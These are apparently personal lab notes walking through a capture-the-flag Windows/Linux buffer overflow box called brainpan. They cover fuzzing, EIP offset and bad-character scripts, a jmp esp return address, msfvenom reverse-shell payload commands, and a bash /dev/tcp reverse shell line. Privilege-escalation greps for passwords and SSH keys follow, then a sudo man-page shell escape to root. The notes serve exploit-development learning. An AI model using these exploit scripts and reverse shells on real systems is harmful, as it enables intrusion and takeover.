buffer overflow of an executable. You can use the BOF windows machine
we found the exe
Buffer Overflow:
open immunity debugger as admin
file >open/attach > the exe you want to find the buffer overflow in
hit play to run the application (if you used open not attach)
make a fuzzer on Kali:
mousepad fuzzer.py
my fuzzer for this (a program that asks for input then you hit enter):
run it:
python3 fuzzer.py
in immunity: use View > CPU > Maximize
find the EIP (the pointer). We want to control the pointer to make it execute something malicious.
it crashed at 1000
reopen immunity:
use script to create a payload:
msf-pattern_create -l 1000
edit the fuzzer again with the 1000-byte pattern as the payload:
mousepad fuzzmsf.py
take note of the EIP address:
35724134
create new script:
msf-pattern_offset -l 1000 -q 35724134
exact offset at 524!
that means that the EIP is at the 525th byte.
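Added example (my own, not from the room or these notes): a small Python script that rebuilds the same non-repeating pattern msf-pattern_create produces and locates the offset the way msf-pattern_offset does. The only values taken from the notes are the EIP value 35724134, the jmp esp address 311712f3 and the length 1000; the function names are mine. It also shows why the debugger's EIP value has to be read backwards: the CPU stores the 4 bytes little-endian, so 35724134 is the string "4Ar5" in memory.

```python
import struct

UPPER = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
LOWER = "abcdefghijklmnopqrstuvwxyz"
DIGITS = "0123456789"


def cyclic_pattern(length):
    """Same layout as msf-pattern_create: Aa0Aa1...Aa9Ab0Ab1... Every
    3-byte triple (upper, lower, digit) is unique, so any 4 bytes that
    land in EIP point at exactly one position in the pattern."""
    out = []
    for u in UPPER:
        for lo in LOWER:
            for d in DIGITS:
                out.append(u + lo + d)
                if len(out) * 3 >= length:
                    return "".join(out)[:length]
    return "".join(out)[:length]


def to_little_endian(hex_value):
    """Turn a 32-bit value as shown in the debugger (e.g. 35724134 or
    311712f3) into the byte order it occupies in memory on x86."""
    return struct.pack("<I", int(hex_value, 16))


def find_offset(eip_hex, length):
    """Offset of the bytes that overwrote EIP inside our pattern.
    Returns -1 if EIP does not contain a piece of the pattern at all
    (which would mean the crash is not the simple overwrite we expect)."""
    pattern = cyclic_pattern(length).encode()
    needle = to_little_endian(eip_hex)
    return pattern.find(needle)


if __name__ == "__main__":
    print(cyclic_pattern(30))                      # Aa0Aa1Aa2Aa3...
    print(to_little_endian("35724134"))            # b'4Ar5'
    print(find_offset("35724134", 1000))           # 524, as in the notes
    print(to_little_endian("311712f3"))            # b'\xf3\x12\x17\x31'
```

A result of 524 means bytes 0-523 are filler and bytes 524-527 are what ends up in EIP, which is why the next test script below sends 524 A's and then BBBB.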
double check that this is right:
send A’s until the EIP then replace EIP with BBBB:
import sys, socket
from time import sleep

buffer = "A" * 524 + "B" * 4   # 524 bytes of filler, then the 4 bytes that land in EIP
print("Sending payload...")
payload = buffer + '\r\n'
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.218.129', 9999))
s.send(payload.encode())
s.close()
EIP comes back to:
42424242
which means we overwrote it with our B's (0x42 is "B"), so the offset is right
find bad characters:
Google badchars and get the github
make a script with the bad characters to find the bad characters:
once you run it, go into immunity debugger and:
go to ESP, right click, Follow in Dump
The hex should be 01, 02, 03, etc in order until FF (like the payload we have up ^). Any bad characters would show up as 00 in the dump. You can remove and retest until you have all the bad characters identified.
example output no bad characters:
example character if x80 was bad:
It shows as 00 instead of 80 so we know we need to remove it and retest!
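Added example (mine, not from the notes): the comparison described above done in Python instead of by eye. It builds the 01..FF string, diffs it against what the dump shows, and builds the -b argument for msfvenom from the result. The dump bytes here are constructed to mimic the case in the notes where x80 comes back as 00; no other values are from the room.

```python
def all_chars(exclude=()):
    """Bytes 0x01..0xFF in order, minus bad characters already found.
    0x00 is never included because it terminates C strings."""
    return bytes(b for b in range(1, 256) if b not in exclude)


def find_badchars(sent, dumped):
    """Compare the bytes we sent with the bytes shown at ESP in the dump.
    Returns the sent byte values that came back changed. If the dump is
    shorter than what was sent, the byte at the cut-off point is reported
    as the suspect, since a bad character can truncate the copy."""
    bad = []
    for i, expected in enumerate(sent):
        if i >= len(dumped):
            bad.append(expected)
            break
        if dumped[i] != expected:
            bad.append(expected)
    return bad


def badchar_arg(bad):
    """String for msfvenom -b, always including \\x00."""
    return "".join("\\x%02x" % b for b in sorted(set(bad) | {0}))


if __name__ == "__main__":
    sent = all_chars()
    # constructed dump: identical to what was sent except 0x80 shows as 0x00
    dumped = bytearray(sent)
    dumped[0x7f] = 0x00
    bad = find_badchars(sent, bytes(dumped))
    print("bad characters:", ["0x%02x" % b for b in bad])   # ['0x80']
    print("msfvenom -b", '"' + badchar_arg(bad) + '"')        # "\x00\x80"
    # next round: resend without the ones found and compare again
    print(len(all_chars(exclude=set(bad))), "bytes in the retest string")
```

If a whole run of bytes after one position is flagged, the first one in the run is usually the real bad character (it mangled or shifted everything after it): remove only that one and retest, as the notes say.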
Mona in Immunity Debugger:
at the bottom of immunity debugger, type:
!mona modules
to check for protections.
brainpan here has all False for all protections.
find a return address:
!mona find -s "\xff\xe4" -m brainpan.exe
those bytes (\xff\xe4) are the opcode for a jmp esp instruction:
the one pointer found:
311712f3
you can find it in the program (is this necessary?):
hit the black → next to play and type that number until it takes you there
we have that jmp esp in it. We can set a breakpoint by hitting F2
make a script:
import sys, socket
from time import sleep

buffer = b"A" * 524 + b"\xf3\x12\x17\x31"   # b is for bytes; 311712f3 written little-endian
print("Sending payload...")
payload = buffer + b'\r\n'
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.218.129', 9999))
s.send(payload)
s.close()
we type the pointer address backwards, so instead of the logical \x31\x17\x12\xf3 you write what's in the code (this is little endian)
this script also builds the payload as bytes directly instead of calling python's encode(). Use this if there are issues with the characters being sent!
we hit the breakpoint on brainpan at the address we specified. That means what we’re doing is working. Now it’s time to make a payload!
run the program and go to Kali:
we use msfvenom:
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.218.128 LPORT=7777 -b "\x00" -f c
we're setting LHOST (kali) and port, then we're listing the bad characters with -b (\x00 is always a bad character), then -f c for C-style output
payload generated:
script (add the b’s in front of the quotes since python encoding was funky):
set a nc listener on 7777
run it with the program running on the computer and you get shell
now we can do this on the website by changing the msfvenom LHOST to tun0 and target address to the website:
msfvenom -p windows/shell_reverse_tcp LHOST=10.6.62.12 LPORT=7777 -b "\x00" -f c
script:
we get shell!
ls doesn’t work. is it windows?:
dir
it's windows, but we have a linux file system. It's a hybrid
if we go to /bin, we can use some of the linux commands
how do we just migrate to a linux shell?
restart the machine
while it’s deploying, make a new linux shell:
msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.6.62.12 LPORT=7777 -b "\x00" -f c
we get linux shell!
get a tty on bash:
python -c 'import pty; pty.spawn("/bin/bash")'
how to completely upgrade to full access with tab auto complete:
ctrl+z
stty raw -echo; fg
reset
#if prompted for Terminal type (I wasn't)
xterm
do the enums:
linpeas found dirtycow
compile:
gcc -pthread dirtycow.c -o dirtycow -lcrypt
sudo -l
grep --color=auto -rnw '/' -ie "PASSWORD=" --color=always 2> /dev/null
find / -name authorized_keys 2> /dev/null
find / -name id_rsa 2> /dev/null
history
find / -perm -u=s -type f 2>/dev/null
find / -type f -perm -04000 -ls 2>/dev/null
dpkg -l | grep nginx
getcap -r / 2>/dev/null
env
ls -la
WHAT I MISSED:
being able to run "manual" and getting the man page for a command means we're effectively running man through sudo, which is on GTFOBins
sudo -l we can run something as sudo and it lets us do manual for any command:
sudo /home/anansi/bin/anansi_util manual ls
opens the ls manual
how to get root with it:
in the manual page:
!/bin/bash
we get root!
this is called a shell escape sequence
checksrv.sh can get us shell?
edit it with echo:
echo "bash -i >& /dev/tcp/10.6.62.12/5555 0>&1" > checksrv.sh
no permission
